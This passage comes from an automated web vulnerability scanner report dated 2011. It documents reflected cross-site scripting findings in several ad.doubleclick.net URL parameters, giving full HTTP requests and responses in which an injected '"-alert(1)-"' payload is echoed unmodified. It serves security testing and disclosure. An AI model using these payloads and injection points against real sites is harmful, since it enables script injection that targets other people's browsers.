Date: Tue, 28 Jun 2011 03:08:40 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
71/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=979568672a"-alert(1)-"4eda465726c&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptac
...[SNIP]...

1.112. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7281a"-alert(1)-"90e990131bf was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=179410017281a"-alert(1)-"90e990131bf&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:09:05 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=179410017281a"-alert(1)-"90e990131bf&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var
...[SNIP]...

1.113. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c87"-alert(1)-"ae535e6c623 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683c2c87"-alert(1)-"ae535e6c623&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5739
Date: Tue, 28 Jun 2011 03:07:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683c2c87"-alert(1)-"ae535e6c623&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone");
var wmode = "opaq
...[SNIP]...

1.114. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43b35"-alert(1)-"26719022c54 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=43b35"-alert(1)-"26719022c54 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5359
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:09:20 GMT
Expires: Tue, 28 Jun 2011 03:09:20 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=43b35"-alert(1)-"26719022c54http://www.universalstudioshollywood.com/ticket_hotel.html?__source=omd_hotel_Outer_xplusone");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false
...[SNIP]...

1.115. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982d"-alert(1)-"af7369214d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930e982d"-alert(1)-"af7369214d&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5664
Date: Tue, 28 Jun 2011 03:05:29 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
966987/1%3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930e982d"-alert(1)-"af7369214d&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df
...[SNIP]...

1.116. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2da41"-alert(1)-"e30b3cebf4a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=1009292da41"-alert(1)-"e30b3cebf4a&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1875
Date: Tue, 28 Jun 2011 03:54:36 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/ab/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=1009292da41"-alert(1)-"e30b3cebf4a&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placements/47553125.j
...[SNIP]...

1.117. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fbf"-alert(1)-"08481952506 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492b8fbf"-alert(1)-"08481952506&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1875
Date: Tue, 28 Jun 2011 03:54:20 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/ab/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492b8fbf"-alert(1)-"08481952506&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placem
...[SNIP]...

1.118. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c38e3"-alert(1)-"32d625406f was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c38e3"-alert(1)-"32d625406f&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1874
Date: Tue, 28 Jun 2011 03:54:53 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c38e3"-alert(1)-"32d625406f&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placements/47553125.js\" type=\"text/javascript\">
...[SNIP]...

1.119. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9d41"-alert(1)-"4c11fe208dc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=e9d41"-alert(1)-"4c11fe208dc HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
